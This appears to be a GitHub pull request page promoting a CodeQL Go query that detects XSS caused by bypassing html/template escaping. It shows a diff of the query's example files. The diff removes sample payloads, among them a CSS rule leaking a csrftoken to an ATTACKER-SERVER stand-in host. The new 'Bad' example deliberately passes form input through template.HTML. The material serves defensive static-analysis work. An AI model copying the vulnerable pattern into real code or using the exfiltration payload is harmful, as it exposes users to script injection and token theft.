Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Appearance settings

Go: promote html-template-escaping-bypass-xss #19386

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 22 commits into
base: main
Choose a base branch
Loading
from
Open

Go: promote html-template-escaping-bypass-xss #19386

Show file tree
Hide file tree
Changes from 1 commit
Commits
Show all changes
22 commits
Select commit Hold shift + click to select a range
5bce70f
Move files out of experimental (no changes)
owen-mc Apr 24, 2025
1530ac1
Update path in qlref and update test results
owen-mc Apr 24, 2025
1926ffd
Convert XSS tests to use inline expectations
owen-mc Apr 24, 2025
c2ebdf5
Change query id to `go/html-template-escaping-bypass-xss`
owen-mc Apr 24, 2025
ca85f0b
Update query metadata
owen-mc Apr 24, 2025
ce4be6d
Refactor to use flow state instead of 3 flow configs (copilot)
owen-mc Apr 24, 2025
4e5a865
Manually fix copilot's mistakes and get query working
owen-mc Apr 24, 2025
cbdbb03
Tidy up test (remove duplicated `main`)
owen-mc Apr 24, 2025
b90aba2
Refactor class for unescaped types
owen-mc Apr 24, 2025
7f007e1
Minor refactor - removed unused argument
owen-mc Apr 24, 2025
3cce4ba
Improve QLDocs
owen-mc Apr 24, 2025
cba0bec
Rename files
owen-mc Apr 25, 2025
e6c19b0
Modernize tests
owen-mc Apr 25, 2025
3b934b8
Add comment on importance of `Function.getACall()`
owen-mc Apr 25, 2025
38dcc1c
Fix QLDoc
owen-mc Apr 25, 2025
f879186
Add missing metadata
owen-mc Apr 25, 2025
6e3b959
Reword qhelp slightly
owen-mc Apr 30, 2025
00cc430
Make examples in qhelp shorter and more realistic
owen-mc May 1, 2025
8283d30
Avoid deprecated function in qhelp examples in same folder
owen-mc May 1, 2025
bef38a4
Add change note
owen-mc May 1, 2025
9ba47eb
Update query suite inclusion integration tests
owen-mc May 1, 2025
c933ab4
Apply suggestions from code review
owen-mc May 12, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Prev Previous commit
Next Next commit
Make examples in qhelp shorter and more realistic
  • Loading branch information
@owen-mc
owen-mc committed May 1, 2025
commit 00cc430ac3a41d6cb2c1eb0f7f93d77340c8cd21
69 changes: 6 additions & 63 deletions 69 go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXssBad.go
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2,69 +2,12 @@ package main

import (
"html/template"
"os"
"net/http"
)

func main() {}
func source(s string) string {
return s
}

type HTMLAlias = template.HTML

func checkError(err error) {
if err != nil {
panic(err)
}
}

// bad is an example of a bad implementation
func bad() {
tmpl, _ := template.New("test").Parse(`Hi {{.}}\n`)
tmplTag, _ := template.New("test").Parse(`Hi <b {{.}}></b>\n`)
tmplScript, _ := template.New("test").Parse(`<script> eval({{.}}) </script>`)
tmplSrcset, _ := template.New("test").Parse(`<img srcset="{{.}}"/>`)

{
{
var a = template.HTML(source(`<a href='example.com'>link</a>`))
checkError(tmpl.Execute(os.Stdout, a))
}
{
{
var a template.HTML
a = template.HTML(source(`<a href='example.com'>link</a>`))
checkError(tmpl.Execute(os.Stdout, a))
}
{
var a HTMLAlias
a = HTMLAlias(source(`<a href='example.com'>link</a>`))
checkError(tmpl.Execute(os.Stdout, a))
}
}
}
{
var c = template.HTMLAttr(source(`href="https://example.com"`))
checkError(tmplTag.Execute(os.Stdout, c))
}
{
var d = template.JS(source("alert({hello: 'world'})"))
checkError(tmplScript.Execute(os.Stdout, d))
}
{
var e = template.JSStr(source("setTimeout('alert()')"))
checkError(tmplScript.Execute(os.Stdout, e))
}
{
var b = template.CSS(source("input[name='csrftoken'][value^='b'] { background: url(//ATTACKER-SERVER/leak/b); } "))
checkError(tmpl.Execute(os.Stdout, b))
}
{
var f = template.Srcset(source(`evil.jpg 320w`))
checkError(tmplSrcset.Execute(os.Stdout, f))
}
{
var g = template.URL(source("javascript:alert(1)"))
checkError(tmpl.Execute(os.Stdout, g))
}
func bad(w http.ResponseWriter, r *http.Request) {
r.ParseForm()
username := r.Form.Get("username")
tmpl, _ := template.New("test").Parse(`<b>Hi {{.}}</b>`)
tmpl.Execute(w, template.HTML(username))
}
14 changes: 6 additions & 8 deletions 14 go/ql/src/Security/CWE-079/HtmlTemplateEscapingBypassXssGood.go
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -2,14 +2,12 @@ package main

import (
"html/template"
"os"
"net/http"
)

// good is an example of a good implementation
func good() {
tmpl, _ := template.New("test").Parse(`Hello, {{.}}\n`)
{ // This will be escaped:
var escaped = source(`<a href="example.com">link</a>`)
checkError(tmpl.Execute(os.Stdout, escaped))
}
func good(w http.ResponseWriter, r *http.Request) {
r.ParseForm()
username := r.Form.Get("username")
tmpl, _ := template.New("test").Parse(`<b>Hi {{.}}</b>`)
tmpl.Execute(w, username)
}
Morty Proxy This is a proxified and sanitized view of the page, visit original site.